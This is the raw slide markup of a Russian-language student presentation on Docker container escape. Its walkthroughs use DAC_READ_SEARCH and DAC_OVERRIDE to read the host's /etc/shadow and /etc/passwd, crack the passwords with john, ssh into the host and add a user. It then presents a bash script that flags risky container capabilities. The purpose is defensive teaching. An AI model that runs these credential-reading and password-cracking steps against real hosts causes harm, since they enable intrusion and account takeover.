                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install -y ssh</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install -y gcc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install john -y #утилита для взлома паролей</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install net-tools</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install -y netcat</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>vim shocker.c #Код для чтения файлов с хоста</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>gcc -o shocker shocker.c</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>./shocker /etc/passwd passwd</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>./shocker /etc/shadow shadow</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>unshadow passwd shadow &gt; password</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>john password #Взлом паролей</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>ssh &lt;USER-NAME&gt;@&lt;HOST-IP&gt;</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>password: &lt;password from john’s output&gt;</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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1" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>6. Перезапись файлов хоста</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Необходимая настройка контейнера:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Привилегии DAC_READ_SEARCH, DAC_OVERRIDE</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>На хосте:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>sudo apt install openssh-server</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>docker run –it --cap-add=DAC_OVERRIDE --cap-add=DAC_READ_SEARCH --cap-add=CHOWN ubuntu bash</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="2400" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="203864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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Привилегия DAC_OVERRIDE позволяет контейнеру перезаписывать файлы хоста. Злоумышленник может заменить пароль рута на свой собственный</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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1" lang="ru-RU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Yu Mincho"/>
                        </a:rPr>
                        <a:t>В контейнере:</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install -y vim # or any other editor</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install -y ssh</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>apt install -y gcc</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>vim shocker.c #Код для чтения файлов хоста</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>gcc -o read shocker.c</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>vim shocker_write.c #Код для записи файлов в хосте</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>gcc -o write shocker_write.c</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>./read /etc/shadow shadow</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>./read /etc/passwd passwd</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>useradd &lt;USER-NAME&gt; #Создание нового пользователя</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>echo '&lt;USER-NAME&gt;:&lt;PASSWORD&gt;' | chpasswd </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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 hMerge="1" rowSpan="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr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ru-RU" sz="2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Если файл hostconfig.json отсутствует (например, после docker pull, но без использования Docker Desktop), то нужную информацию можно получить через docker inspect</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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20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docker inspect (образ) --format='{{.ContainerConfig.HostConfig.CapAdd}}'  &gt;&gt; hostconfig.json</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>#!bin/bash</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>read CONT_PATH  </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>if  grep -qF SYS_ADMIN $CONT_PATH/hostconfig.json; then</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>  </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>echo 'Warning: SYS_ADMIN cap enabled, container may control host file system'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>fi</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>if  grep -qF SYS_PTRACE $CONT_PATH/hostconfig.json; then</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>echo 'Warning: SYS_PTRACE cap enabled, container may control host processes'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>fi</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>if  grep -qF SYS_MODULE $CONT_PATH/hostconfig.json; then</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>echo 'Warning: SYS_MODULE cap enabled, container may control host kernel modules'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>fi</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>if  grep -qF DAC_READ_SEARCH $CONT_PATH/hostconfig.json; then</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>echo 'Warning: DAC_READ_SEARCH cap enabled, container may read host files'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>fi</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>if  grep -qF DAC_OVERRIDE $CONT_PATH/hostconfig.json; then</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>echo 'Warning: DAC_OVERRIDE cap enabled, container may change host files'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>fi</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>if  grep -qF docker.sock: $CONT_PATH/hostconfig.json; then</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>echo 'Warning: docker.sock is mounted, container may create vulnerable containers'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>fi</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>if  grep -qF apparmor=unconfined $CONT_PATH/hostconfig.json; then</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>        </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>echo 'Warning: AppArmor security module disabled, container may cause threat to the host'</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>fi</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="20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Yu Mincho"/>
                        </a:rPr>
                        <a:t>echo 'Users in docker group can create any container, including vulnerable:’</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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228600">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2000" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="ff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Yu Mincho"/>
                        </a:rPr>
                        <a:t>cat /etc/group| grep docker| sed -e "s/:/ /g"| awk {'print $4'}</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="20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  <a:tr h="518400">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" gridSpan="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2"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ru-RU" sz="2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ТЕСТИРОВАНИЕ СКРИПТА</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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  <a:tr h="4784400">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" gridSpan="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr marL="228600" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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Тестирование продукта проводилось на серии контейнеров из </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="222222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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Docker Hub</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>. Было проверено, что контейнеры с типичными уязвимостями обнаруживаются разработанным мной скриптом. При этом ложных срабатываний на другие контейнеры не происходило. Ошибки первого рода (ошибочное распознавание) не проявлялись. Ошибки второго рода (пропуск уязвимости) не проявлялись.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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228600" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>Таким образом тестирование моего скрипта доказало, что уязвимости Docker Escape всегда можно избежать, если тщательно проверять расширения, которые запрашивает контейнер.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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  <a:tr h="518400">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" gridSpan="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2"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ru-RU" sz="2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ВЫВОДЫ</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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</a:tr>
              <a:tr h="5823720">
                <a:tc vMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" gridSpan="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc gridSpan="2" rowSpan="3">
                  <a:txBody>
                    <a:bodyPr/>
                    <a:p>
                      <a:pPr marL="457200" indent="-456840" algn="just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ru-RU" sz="2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несмотря на удобство и эффективность, Docker не обеспечивает полной изоляции контейнеров, что приводит к уязвимостям из-за неправильных настроек; </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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457200" indent="-45684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ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>доказано, что уязвимость Docker Escape всё ещё можно реализовать;</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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457200" indent="-456840" algn="just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ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>разработанный скрипт удовлетворяет таким требованиям как удобство использования, интегративность, модульность, защищенность, статический анализ и является эффективным инструментом для тестирования безопасности Docker-контейнеров  на уязвимость Docker Escape;</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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457200" indent="-456840" algn="just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ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>проверка контейнеров на уязвимость с помощью предложенного скрипта поможет решить существенную проблему информационной безопасности и сократить количество случаев получения несанкционированного доступа к пользовательским устройствам.</a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2800" spc="-1" strike="noStrike">
                          <a:solidFill>
                            <a:srgbClr val="333333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Yu Mincho"/>
                        </a:rPr>
                        <a:t> </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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 marL="228600" algn="just">
                        <a:lnSpc>
                          <a:spcPct val="100000"/>
                        </a:lnSpc>
                        <a:spcBef>
                          <a:spcPts val="601"/>
                        </a:spcBef>
                      </a:pPr>
                      <a:r>
                        <a:rPr b="1" lang="ru-RU" sz="2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Yu Mincho"/>
                        </a:rPr>
                        <a:t>В качестве развития системы планируется </a:t>
                      </a:r>
                      <a:r>
                        <a:rPr b="0" lang="ru-RU" sz="2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ea typeface="Yu Mincho"/>
                        </a:rPr>
                        <a:t>использовать утилиту jq для проверки json без лишних false positive (в частности,  на упоминания в env) и с меньшими шансами false negative (например, если маленькие латинские буквы в JSON-е экранируется как \xxxx).</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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 hMerge="1" rowSpan="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="518400">
                <a:tc gridSpan="3"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ru-RU" sz="2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ПРИНЦИП РАБОТЫ СКРИПТА ДЛЯ ПРОВЕРКИ КОНТЕЙНЕРОВ </a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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vMerge="1" gridSpan="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
              </a:tr>
              <a:tr h="3078000">
                <a:tc gridSpan="3">
                  <a:txBody>
                    <a:bodyPr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ru-RU" sz="2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Предполагаем, что пользуемся Docker Desktop. Bash-скрипт, который считывает файл hostconfig.json данного контейнера, проверяет его привилегии и предупреждает пользователя, если существует опасность Docker Escape. Скрипт эквивалентен детерминированному конечному автомату с начальным состоянием в виде точки старта, конечными состояниями «опасно» или «безопасно», а также переходами по обнаруженным уязвимостям. По результатам работы пользователю рекомендуется отказаться от лишних возможностей, предоставляемых контейнеру, если это не является критически необходимым для его работы.</a:t>
                      </a:r>
                      <a:endParaRPr b="0" lang="ru-RU" sz="2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hMerge="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" gridSpan="1">
                  <a:tcPr>
                    <a:solidFill>
                      <a:srgbClr val="729fcf"/>
                    </a:solidFill>
                  </a:tcPr>
                </a:tc>
                <a:tc vMerge="1" hMerge="1">
                  <a:tcPr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  <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="46" name="CustomShape 5"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19500480" y="12701880"/>
            <a:ext cx="9781560" cy="52344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ru-RU" sz="2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Docker Hub 4 000 000  образов</a:t>
            </a:r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CustomShape 6"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19500480" y="13227480"/>
            <a:ext cx="5286240" cy="447840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00b0f0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CustomShape 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19500480" y="14289480"/>
            <a:ext cx="1274400" cy="447840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00b0f0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CustomShape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19500480" y="15518520"/>
            <a:ext cx="85680" cy="447840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00b0f0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CustomShape 9"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19500480" y="13749480"/>
            <a:ext cx="2148120" cy="447840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00b0f0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CustomShape 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19500480" y="14852880"/>
            <a:ext cx="405720" cy="447840"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="00b0f0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CustomShape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="24968880" y="13120560"/>
            <a:ext cx="4313160" cy="106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ru-RU" sz="24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51%</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="28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ru-RU" sz="18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образов содержат пакеты или зависимости по меньшей мере  с одной критической уязвимостью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CustomShape 12"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="21690720" y="13754880"/>
            <a:ext cx="787428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20%</a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="18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образов не уязвимы.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CustomShape 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="20775240" y="14275080"/>
            <a:ext cx="787428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ru-RU" sz="28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13% </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="18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образов уязвимы перед багами высокой степени серьезности.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CustomShape 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19908000" y="14829480"/>
            <a:ext cx="5150880" cy="51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ru-RU" sz="28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4% </a:t>
            </a:r>
            <a:r>
              <a:rPr b="0" lang="ru-RU" sz="18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образов c умеренной уязвимостью.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CustomShape 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="19635120" y="15396120"/>
            <a:ext cx="9440640" cy="133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ru-RU" sz="28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0,16% </a:t>
            </a:r>
            <a:r>
